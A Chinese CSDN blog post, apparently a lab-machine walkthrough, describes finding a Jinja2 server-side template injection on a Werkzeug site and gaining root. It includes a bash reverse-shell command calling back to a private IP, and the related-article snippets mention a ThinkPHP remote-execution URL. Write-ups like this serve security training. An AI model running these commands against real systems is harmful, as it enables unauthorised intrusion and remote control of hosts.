内网靶机实战

已于 2023-11-12 21:12:50 修改
阅读量1.9k 收藏 1
点赞数
文章标签: 安全
于 2023-01-29 22:02:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41672971/article/details/128743841
版权

IP地址

http://121.37.186.22/?name=2023

访问

发现name可以修改回显的结果

这时再看看 Response Headers

可知 Server: Werkzeug/2.0.3 Python/3.6.8 ,尝试 Jinja2 SSTI:

测试

发现确实存在SSTI漏洞

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#exploit-the-ssti-by-calling-ospopenread

拿到了root权限

所以不需要提权

很明显ID参数是执行命令

可以利用burp进行反弹shell

利用bash反弹shell


bash -i >& /dev/tcp/192.168.52.128/6666 0>&1

bboywxy8340
关注
记一次内网靶机实战
千寻的博客
11-05 2179
记一次内网靶机实战记录,1、shiro反序列化漏洞 2、strut2漏洞 3、Drupal漏洞 4、内网代理工具 5、数据库连接工具 6、window的samba漏洞 7、viper的使用
内网三层靶机实战
m0_63206880的博客
12-26 2063
第一步:扫描Target1 第二步:既然存在http服务,那就用浏览器打开访问看看是个什么 第三步:根据 ThinkPHPv5 然后进行百度 然后得知存在命令执行漏洞然后进行漏洞测试 通过这句话进行远程命令执行上传webshell脚本:"http://192.168.1.11/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&var...
HTB:Chemistry
imawuya的博客
12-15 796
靶机:10.10.16.17。
Vulnhub-medium_socnet
weixin_46107179的博客
03-27 4397
靶机下载 搭建好靶机环境之后,进行全端口扫描,该靶机开放了22和5000端口 然后进行对端口进行服务扫描,得到一个python环境下搭建的web框架,版本是Werkzeug httpd 0.14.1,Werkzeug是一个WSGI工具包,也可以作为一个Web框架的底层库 然后在浏览器中访问该地址端口,并没有什么可以利用的;然后对隐藏目录进行扫描,得到一个admin目录 然后访问admin目录,得到一个可以执行代码的文本框 简单测试普通代码可以执行代码 接着我们可以在网上找一段利用Python代码进
werkzeug第一个坑
不务正业的猿
04-20 3713
最近在买了一本关于TensorFlow 2.0的实战编程书(走向TensorFlow 2.0深度学习应用编程快速入门),里面是附带源码,书里说的代码都是验证过的,对于一个初学者来说,从零开始搭建项目,确实是会遇到不同的坑。由于自己很久没有写过python代码,而且电脑也是新的,python相关环境都没有。首先需要装好Anaconda,再安装TensorFlow相关库,再搞个开发工具pycharm,...
SSTI漏洞基础解析
weixin_43895765的博客
04-01 5647
🚩flask基础 flask是python编写的一个WEB应用程序框架,flask由Armin Ronacher带领的一个Pocco团队开发,flask基于werkzeug WSGI工具包个jinjia2模板引擎~ WSGI:Web Server Gateway Interface 即WEB服务器网关接口 🚩第一个flask程序 # 从flask中导入Flask,注意,flask是包名,Flask是模块名 from flask import Flask # 初始化Flask app = Flask(
漏洞靶场实战-Vuluhub medium_socnet
ZL_1618的博客
01-04 996
Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
记一次awd源码分析
tddjjjxxx的博客
11-22 299
这个应该是我20年时遇到的题目,现在补发记录。该源码是由werkzeug和flask共同搭建,入口文件为run.py,根据每一个@app.route去看路由就很好分析,自己搭环境运行访问首页如下图。
内网渗透实战技巧 PDF文件
最新发布
01-02
内网渗透实战技巧的文章为我们详细讲解了在VulnStack1靶机环境下,如何进行内网渗透。VulnStack1是由红日安全团队开发的一个内网渗透靶机环境,其目的在于模拟真实的内网环境,帮助渗透测试人员练习和掌握内网渗透的...
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 4395
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(三)w1r3s-101
hyjcking的博客
11-24 1390
在游览器中输入上面的url,页面没有回显,但是可以肯定的是这个php文件是存在的,可能是因为这个网站的cms经过二次开发导致目录结构发生改变,所以无法访问通,所以我打算使用curl对参数urlconfig进行urlencode编码。接下来我们只需要破解这段密文即可,把拥有密码的几个用户全部保存到pass.txt文档上(在桌面创建一个),然后命令:john pass.txt跑出密码。接下来的步骤就很明朗了,直接去百度上搜cuppa cms的漏洞,找到漏洞编号。开启靶机之后先扫了一下内网IP找到靶机的IP。
[原创]夺棋赛HackTheBox OpenSource攻略
huandaohack的专栏
06-26 2845
夺棋赛HackTheBox OpenSource攻略
sx:快速强大易于使用的现代化网络扫描器
m0_59598029的博客
08-02 480
运行速度比Nmap要快30倍;ARP扫描:支持扫描本地网络以检测活动设备;ICMP扫描:使用高级ICMP扫描技术来检测活动主机和防火墙规则;TCP SYN扫描:传统半开放扫描以查找开放TCP端口;TCP FIN/NULL/XMAS扫描:扫描某些防火墙绕过技术;自定义TCP扫描:发送任意形式数据包,并获得回复数据包中设置的所有TCP标志的结果;UDP扫描:扫描UDP端口并获取全部ICMP响应,以检测开放端口和防火墙规则;
Linux/Agile
ve9etable的博客
03-22 1187
扫描发现对外开放了22和80端口,使用nmap详细扫描这两个端口详细扫描22和80端口,22端口运行着ssh服务,80端口运行着http服务,nmap揭示了域名superpass.htb,将其添加到/etc/hosts。
云演CTF: 005.Blog
wanguixiu的博客
06-09 887
云演CTF: 005.Blog 作者: admin 时间: 2021-05-28 分类: 云演CTF 网站是个没有内容的博客,返回头表明了后端语言"Werkzeug/1.0.1 Python/2.7.6",尝试几个"www.zip,robots.txt"之类的路径没什么发现,然后各个标签点了点,发现了/div/目录,是这个样子的google一...
Werkzeug更新带来的Flask debug pin码生成方式改变
BlusKing
07-06 1467
前言: 首发在Freebuf:https://www.freebuf.com/articles/network/238485.html于2020.4月成稿,时隔3个月被发布,内容为flask debug pin码构造方式的改变。 正文: 复现2020GYCTF-FLASKAPP及 2019CISCN double_secret出现异常。题目本身有两个解题方式。其中一个思路是: 当Flask开启debug模式时,可以在报错页面输入pin码来执行python命令。 ...
渗透测试流程模拟01
SCR_123的博客
08-14 295
靶场下载地址:http://www.vulnhub.com/entry/boredhackerblog-social-network,454/ 主机发现 nmap 192.168.56.0/24 端口扫描 对靶机全端口扫描nmap -p- 192.168.56.0/24 服务扫描 查看端口运行的的服务,Werkzeug为基于python开发的底层框架,后端开发为python,后续利用python脚本反弹shell,获取控制权 漏洞发现 打开浏览器,是一个社交网站,通过网站可以匿名发布信息,首先可对该页面
Talking Web
qq_74259765的博客
06-25 946
pwn.college部分做题笔记与知识点拓展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值